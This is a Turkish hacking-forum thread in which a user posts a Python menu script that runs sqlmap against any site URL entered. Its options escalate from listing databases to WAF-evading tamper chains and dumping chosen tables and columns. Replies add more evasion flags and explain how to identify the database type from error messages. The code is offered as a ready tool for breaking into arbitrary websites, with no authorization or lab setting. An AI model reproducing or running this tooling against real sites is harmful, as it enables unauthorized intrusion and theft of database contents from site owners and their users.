Auto SqlMap - Zahmetsiz

K3D

Katılımcı Üye
1 Mar 2021
629
555
30
root
eline sağlık ancak gereğinden fazla tamper kullanılmış bu ne anlama geliyor ? bazen sqlmap çok fazla tamperden dolayı bulamayabiliyor ne yazıkki 4 veya 5 yetecektir ve bazı parametreler unutulmuş sadece level risk tamperle olmuyor destelerce parametre var mesela = --skip-waf --no-cast --hex (no-cast ve hex bir arada kullanılamaz) ve daha fazlasını yazabilirsin tekrardan eline sağlık
Teşekkür ederim dostum, açık kaynak olduğu için pek fazla ekleme yapmadım, dediğim gibi düzeltilebilir, öneri için teşekkürler dikkate alacağım.

Teşekkür ederim.

linux da çalışıyor mu? ben çalıştıramadım da.
Linux versiyonunu kısa zaman sonrasında atacağım Hocam

Ellerine sağlık çok başarılı :)
Teşekkür ederim.

Rica ederim gardaş

Eline sağlık, başarılar.
Teşekkür ederim Mascar :)

geliştirile bilir daha çok . Eline saglık çalışmalarını beklıyorum. güzel çalışma :)
Teşekkür ederim kardeşim, elbette geliştirilecek.

Teşekkür ederim Cürüm :)
 

CATALYN

Üye
1 Eyl 2021
55
69
New York
Cümleten Selamın Aleyküm Türk Hack Team Ailem...

Sizlere kendi yazdığım bir programı tanıtmak istiyorum, eğer sürekli sqlmap.py -u falan yazmak istemiyorsanız işinizi görecek bir program.

Program PYTHON ile yazıldı ve kullanımı da olukça kolay.

Kodumuz;
Python:
# TURKHACKTEAM ~ K3D

from datetime import time
import os
from time import sleep

# Konsolu Temizleyelim
os.system("color a")
os.system("cls")

while(True):
    islem = input("""
                                    CODED BY TURKHACKTEAM ~ K3D
     
        1-) Normal [DBS]
        2-) Orta [LEVEL / RİSK / DBS / BATCH]
        3-) Yüksek [TAMPER / LEVEL / RİSK / DBS / BATCH]
        4-) Karışma Bende [RANDOM AGENT / TAMPER / LEVEL / RİSK / DBS / BATCH]

        DATA BİLGİLERİ VAR İSE

        5-) DB Bilgi
        6-) Tablo Bilgi
        7-) Column Bilgi
        8-) Verileri Çek
 
    """)

    yol = "SQLMAP Yolu" # Sisteminize Göre Ayarlayınız.

    if islem == "1":
        link = str(input("Lütfen Site Adresi Girin: "))
        sleep(2)
        os.chdir(yol)
        os.system(f"sqlmap.py -u {link} --dbs")
    elif islem == "2":
        link2 = str(input("Lütfen Site Adresi Girin: "))
        sleep(2)
        os.chdir(yol)
        os.system(f"sqlmap.py -u {link2} --level=5 --risk=3 --batch --dbs")
    elif islem == "3":
        link3 = str(input("Lütfen Site Adresi Girin: "))
        sleep(2)
        os.chdir(yol)
        os.system(f"sqlmap.py -u {link3} --tamper=between,bluecoat,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,randomcase,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes,xforwardedfor --level=5 --risk=3 --batch --dbs")
    elif islem == "4":
        link4 = str(input("Lütfen Site Adresi Girin: "))
        sleep(2)
        os.chdir(yol)
        os.system(f"sqlmap.py -u {link4} --random-agent --tamper=between,bluecoat,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,randomcase,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes,xforwardedfor --level=5 --risk=3 --batch --dbs")
    elif islem == "5":
        link5 = str(input("Lütfen Site Adresi Girin: "))
        data_isim1 = str(input("Lütfen Data İsmi Giriniz: "))
        sleep(2)
        os.chdir(yol)
        os.system(f"sqlmap.py -u {link5} --batch -D {data_isim1} --tables")
    elif islem == "6":
        link6 = str(input("Lütfen Site Adresi Girin: "))
        data_isim2 = str(input("Lütfen Data İsmi Giriniz: "))
        table_ismi1 = str(input("Lütfen Table İsmi Giriniz: "))
        sleep(2)
        os.chdir(yol)
        os.system(f"sqlmap.py -u {link6} --batch -D {data_isim2} -T {table_ismi1} --columns")
    elif islem == "7":
        link7 = str(input("Lütfen Site Adresi Girin: "))
        data_isim3 = str(input("Lütfen Data İsmi Giriniz: "))
        table_ismi2 = str(input("Lütfen Table İsmi Giriniz: "))
        column_ismi1 = str(input("Lütfen Column İsmi Giriniz: "))
        sleep(2)
        os.chdir(yol)
        os.system(f"sqlmap.py -u {link7} --batch -D {data_isim3} -T {table_ismi2} -C {column_ismi1}")
    elif islem == "8":
        link8 = str(input("Lütfen Site Adresi Girin: "))
        data_isim4 = str(input("Lütfen Data İsmi Giriniz: "))
        table_ismi3 = str(input("Lütfen Table İsmi Giriniz: "))
        column_ismi2 = str(input("Lütfen Column İsmi Giriniz: "))
        sleep(2)
        os.chdir(yol)
        os.system(f"sqlmap.py -u {link8} --batch -D {data_isim4} -T {table_ismi3} -C {column_ismi2} --dump")
    else:
        print("Hatalı Bir İşlem Yapmadığına Emin misin?")

Ekran görüntüsü;

fdxigtu.jpg


Şimdilik bu kadarını yaptım, yakında daha gelişmiş versiyonlarını atacağım
Umarım işinizi görür :)
geliştirile bilir daha çok . Eline saglık çalışmalarını beklıyorum. güzel çalışma :)
 

R1Px

Üye
10 Eyl 2021
69
32
25
127.0.0.1
Teşekkür ederim dostum, açık kaynak olduğu için pek fazla ekleme yapmadım, dediğim gibi düzeltilebilir, öneri için teşekkürler dikkate alacağım.
ben teşekkür ederim, bypasslar önemli bypass severiz :D

--random-agent --tamper=between,randomcase,space2comment --level=3 --risk=3 --skip-waf --hex --time-sec=3 --threads=2 --drop-set-cookie --answers="optimize=Y" --data="" --dbms="" --batch -v 3 --dbs buyur bu parametreler gayet iyi ancak dbms ve datayı ayarlaman gerek data mesela şu index.php?id=12 desek şöyle = --data="id=12" olması gerek 2. dbms linkin sonuna ' veya " koyduğumuzda gelen hataya bakılmalı Warming MySQL yazarsa --dbms="MySQL" deriz ancak MsSQL de olabilir o yüzden yeni bi input oluşturup kullanıcının girmesi gerek :D

Ellerine sağlık usta aynı zamanda misahşör bir dil de eklemişsin programa ellerine sağlık :D
Teşekkür ediyorum gardaşım benim :) iyi kullanımlar, iyi kodlamalar

Merhaba Sqlmap yolu derken nasıl birşey yazmamız gerekiyor yardımcı olur musunuz
Tabii, SqlMap yolu derken SqlMap klasörünün konumu gerekiyor dostum. Videolu bir anlatımını birazdan düzenleyip ekleyeceğim.

--random-agent --tamper=between,randomcase,space2comment --level=3 --risk=3 --skip-waf --hex --time-sec=3 --threads=2 --drop-set-cookie --answers="optimize=Y" --data="" --dbms="" --batch -v 3 --dbs buyur bu parametreler gayet iyi ancak dbms ve datayı ayarlaman gerek data mesela şu index.php?id=12 desek şöyle = --data="id=12" olması gerek 2. dbms linkin sonuna ' veya " koyduğumuzda gelen hataya bakılmalı Warming MySQL yazarsa --dbms="MySQL" deriz ancak MsSQL de olabilir o yüzden yeni bi input oluşturup kullanıcının girmesi gerek :D
Saolasın kuzum, eklemesini yapar atarım o şekil de, açıklamalar da girerim.
 
  • Sevgi dolu
Tepkiler: K3D

R3SBUM

Yeni üye
28 Nis 2020
19
8
Merhaba Sqlmap yolu derken nasıl birşey yazmamız gerekiyor yardımcı olur musunuz
 

Helmsys

Yazılım Ekibi Kıdemli
16 Mar 2022
1,490
1,649
Linux versiyonunu kısa zaman sonrasında atacağım Hocam
Sistem adını posix mi nt mi olduğunu sorgulatırsanız yeni versiyonunu yapmanıza gerek kalmaz. İki adet de fonksiyon oluşturursunuz biri windows için diğeri linux. Gerekli yerleri de değiştirirsiniz. Zaten yaptığınız şey terminale yazılması gereken argumanları system fonksiyonuna string tipinde yazıp ilgili değişiklikleri de f-string ile yapıyor olmanız.

Elinize Sağlık
 
  • Sevgi dolu
Tepkiler: K3D

K3D

Katılımcı Üye
1 Mar 2021
629
555
30
root
Sistem adını posix mi nt mi olduğunu sorgulatırsanız yeni versiyonunu yapmanıza gerek kalmaz. İki adet de fonksiyon oluşturursunuz biri windows için diğeri linux. Gerekli yerleri de değiştirirsiniz. Zaten yaptığınız şey terminale yazılması gereken argumanları system fonksiyonuna yazıp ilgili değişiklikleri de f-string ile yapıyor olmanız.

Elinize Sağlık
Teşekkür ediyorum Helmsys
 

freebsd

Yeni üye
24 Nis 2020
31
5
aloo, arkadaşlar sql işleri eskidi başka şeylere yönelin artık isterseniz. web siteler sql ile hacklenmiyor artık.(genel anlamda)
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.